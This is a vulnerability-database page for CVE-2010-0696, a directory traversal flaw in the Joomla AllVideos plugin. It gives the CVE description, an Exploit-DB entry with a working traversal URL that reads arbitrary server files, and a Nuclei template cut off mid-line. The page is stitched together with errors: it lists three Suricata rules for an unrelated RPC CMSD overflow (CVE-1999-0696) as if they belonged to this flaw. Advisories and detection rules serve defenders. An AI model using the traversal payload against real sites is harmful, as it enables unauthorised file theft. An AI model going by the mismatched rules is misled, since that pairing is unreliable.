CVE-2010-0696
published 2010-02-23
Priority P343 · medium · 5 (CVSS 2.0)
AV:N/AC:L/Au:N/C:P/I:N/A:N
EXPLOIT
EPSS 28.22% · 97.9th percentile
Directory traversal vulnerability in includes/download.php in the JoomlaWorks AllVideos (Jw_allVideos) plugin 3.0 through 3.2 for Joomla! allows remote attackers to read arbitrary files via a ./../.../ (modified dot dot) in the file parameter.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| joomlaworks | jw_allvideos | — | — |
| joomlaworks | jw_allvideos | — | — |
| joomlaworks | jw_allvideos | — | — |
Suricata
GPL RPC CMSD TCP CMSD_CREATE buffer overflow attempt
suricata·2010-09-23
CVE-1999-0696 GPL RPC CMSD TCP CMSD_CREATE buffer overflow attempt
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"GPL RPC CMSD TCP CMSD_CREATE buffer overflow attempt"; flow:established,to_server; content:"|00 01 86 E4|"; depth:4; offset:16; content:"|00 00 00 15|"; within:4; distance:4; byte_jump:4,4,relative,align; byte_jump:4,4,relative,align; byte_test:4,>,1024,0,relative; content:"|00 00 00 00|"; depth:4; offset:8; reference:bugtraq,524; reference:cve,1999-0696; classtype:attempted-admin; sid:2101908; rev:11; metadata:created_at 2010_09_23, cve CVE_1999_0696, confidence High, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_08;)
Suricata
GPL RPC CMSD TCP CMSD_INSERT buffer overflow attempt
suricata·2010-09-23
CVE-1999-0696 GPL RPC CMSD TCP CMSD_INSERT buffer overflow attempt
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"GPL RPC CMSD TCP CMSD_INSERT buffer overflow attempt"; flow:established,to_server; content:"|00 01 86 E4|"; depth:4; offset:16; content:"|00 00 00 06|"; within:4; distance:4; byte_jump:4,4,relative,align; byte_jump:4,4,relative,align; byte_jump:4,0,relative,align; byte_test:4,>,1000,28,relative; content:"|00 00 00 00|"; depth:4; offset:8; reference:bugtraq,524; reference:cve,1999-0696; reference:url,www.cert.org/advisories/CA-99-08-cmsd.html; classtype:misc-attack; sid:2101909; rev:14; metadata:created_at 2010_09_23, cve CVE_1999_0696, confidence High, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_08;)
Suricata
GPL RPC CMSD UDP CMSD_CREATE buffer overflow attempt
suricata·2010-09-23
CVE-1999-0696 GPL RPC CMSD UDP CMSD_CREATE buffer overflow attempt
Rule: alert udp $EXTERNAL_NET any -> $HOME_NET any (msg:"GPL RPC CMSD UDP CMSD_CREATE buffer overflow attempt"; content:"|00 01 86 E4|"; depth:4; offset:12; content:"|00 00 00 15|"; within:4; distance:4; byte_jump:4,4,relative,align; byte_jump:4,4,relative,align; byte_test:4,>,1024,0,relative; content:"|00 00 00 00|"; depth:4; offset:4; reference:bugtraq,524; reference:cve,1999-0696; classtype:attempted-admin; sid:2101907; rev:11; metadata:created_at 2010_09_23, cve CVE_1999_0696, confidence High, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2019_07_26;)
Exploit-DB
Joomla! Component Jw_allVideos - Arbitrary File Download
exploitdb·2010-02-14
CVE-2010-0696 Joomla! Component Jw_allVideos - Arbitrary File Download
---
#################################################################
# Securitylab.ir
#################################################################
# Application Info:
# Name: Joomla (jw_allvideos Plugin)
# Version: 1.0
#################################################################
# Vulnerability Info:
# Type: Remote File Download
# Risk: Medium
#################################################################
# Vulnerability:
# http://site.com/plugins/content/jw_allvideos/includes/download.php?file=./../.../file.php
#################################################################
# Discovered By: Pouya Daneshmand
# Website: http://securitylab.ir
# Contacts: admin[at]securitylab.ir & whh_iran[AT]yahoo.com
#################
Nuclei
Joomla! Component Jw_allVideos - Arbitrary File Retrieval
nuclei·CVSS 5.0
CVE-2010-0696 [MEDIUM] Joomla! Component Jw_allVideos - Arbitrary File Retrieval
A directory traversal vulnerability in includes/download.php in the JoomlaWorks AllVideos (Jw_allVideos) plugin 3.0 through 3.2 for Joomla! allows remote attackers to read arbitrary files via a ./../.../ (modified dot dot) in the file parameter.
Template:
id: CVE-2010-0696
info:
  name: Joomla! Component Jw_allVideos - Arbitrary File Retrieval
  author: daffainfo
  severity: medium
  description: A directory traversal vulnerability in includes/download.php in the JoomlaWorks AllVideos (Jw_allVideos) plugin 3.0 through 3.2 for Joomla! allows remote attackers to read arbitrary files via a ./../.../ (modified dot dot) in the file parameter.
  impact: |
    An attacker can exploit this vulnerability to retrieve arbitrary files from the server.
re
http://osvdb.org/62331
http://secunia.com/advisories/38587
http://www.exploit-db.com/exploits/11447
http://www.joomlaworks.gr/content/view/77/34/
http://www.securityfocus.com/bid/38238